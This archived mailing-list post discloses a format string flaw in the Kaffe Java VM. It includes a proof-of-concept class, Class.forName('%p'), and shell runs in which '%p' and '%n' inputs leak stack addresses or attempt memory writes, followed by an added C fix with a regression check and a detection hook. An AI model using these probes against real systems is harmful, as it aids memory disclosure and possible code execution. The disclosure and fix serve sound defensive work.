Vulnerability Development mailing list archives
Latest Kaffe Java Virtual Machine Format Strings issue.
From: KF <dotslash () snosoft com>
Date: Tue, 05 Mar 2002 12:07:17 -0500
OK, I sent this out twice already... I don't know what happened... I got zero response from vuln-dev or from the vendor for that matter... so let's try again... The latest version of the kaffe JVM and most of the older versions I tested are vulnerable to format string attacks... Below are 2 local examples... one from the java command line and one malicious class file. Perhaps this could be remotely exploited via a servlet engine or something that serves out jsp pages... maybe even a malicious .class could take advantage of it (example provided) with java.lang.Class.forName(). I think it needs to be addressed either way. This was sent to the kaffe authors' email address with no response, as well as posted on their bug-tracking forum thing, which I can't seem to figure out how to navigate... so there was an attempt at vendor notification.
-KF

[root@localhost root]# cat > test.java
class test {
    public static void main(String args[]) throws Exception {
        Class c = Class.forName("%p");
    }
}
[root@localhost root]# javac test.java
[root@localhost root]# java test
java.lang.NoClassDefFoundError: 0x4003256a   <---------------- note the memory address here.
        at java.lang.Class.forName(Class.java:native)
        at java.lang.Class.forName(Class.java:52)
        at test.main(test.java:6)
[root@localhost root]# rpm -ivh kaffe-1.0.6-6.i386.rpm
Preparing...                ########################################### [100%]
   1:kaffe                  ########################################### [100%]
[root@localhost root]# which kaffe
/usr/bin/kaffe
[root@localhost root]# kaffe -version
Kaffe Virtual Machine
Copyright (c) 1996-2000 Transvirtual Technologies, Inc.  All rights reserved
Engine: Just-in-time v3   Version: 1.0.6   Java Version: 1.1
[root@localhost root]# kaffe %p.%p.%p.%p.%p
java.lang.NoClassDefFoundError: 0x4003256a/0x4006fa14/0xbfffee98/0xbfffed80/0x40033910
        at java.lang.Class.forName(Class.java:native)
        at java.lang.Class.forName(Class.java:52)
[root@localhost root]# kaffe %n

-KF
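Added example, not Kaffe's own source (the post shows only the symptom, not the native code behind it): a C reconstruction of the bug class the session demonstrates. The vulnerable shape, an error message built with the unresolved class name as the printf format, is shown in the comment; the runnable code is the corrected builder that passes the name as a "%s" argument, a regression check that confirms a name such as %p.%p stays literal, and a small detection hook for lookups that carry a '%'. MSG_LEN, PREFIX and the function names are assumptions of this example.

```c
/* Added example, not Kaffe's source (the post shows only the symptom).
 * A JVM reports NoClassDefFoundError with the name it failed to load.
 * The defect class shown above is building that message with the
 * name as the printf FORMAT, e.g.
 *     snprintf(msg, sizeof msg, classname);          // vulnerable
 * so "%p" in the name reads stack slots (the addresses in the session)
 * and "%n" writes memory.  The corrected builder below passes the
 * name as a "%s" argument, so it is copied, never interpreted. */
#include <stdio.h>
#include <string.h>

#define MSG_LEN 256
static const char PREFIX[] = "java.lang.NoClassDefFoundError: ";

/* FIXED: format is a compile-time literal; the name is plain data. */
void build_error_fixed(char *out, size_t n, const char *classname)
{
    snprintf(out, n, "%s%s", PREFIX, classname);
}

/* Returns 1 if the builder preserved the name byte-for-byte, i.e. no
 * directive inside it was expanded.  A regression check for the fix. */
int name_kept_literal(const char *classname)
{
    char msg[MSG_LEN];
    build_error_fixed(msg, sizeof msg, classname);
    return strncmp(msg, PREFIX, sizeof PREFIX - 1) == 0
        && strcmp(msg + sizeof PREFIX - 1, classname) == 0;
}

/* Detection hook: '%' never occurs in a legitimate Java class name, so
 * a lookup for one is worth logging as a format-string probe. */
int has_format_directive(const char *classname)
{
    return strchr(classname, '%') != NULL;
}

int main(void)
{
    char msg[MSG_LEN];
    /* constructed input mirroring the post's "kaffe %p.%p.%p.%p.%p" */
    build_error_fixed(msg, sizeof msg, "%p.%p.%p.%p.%p");
    puts(msg);   /* name printed literally; no addresses leak */
    return 0;
}
```

Building with -Wformat -Wformat-security makes the compiler flag the vulnerable shape in the comment wherever it still exists in a code base.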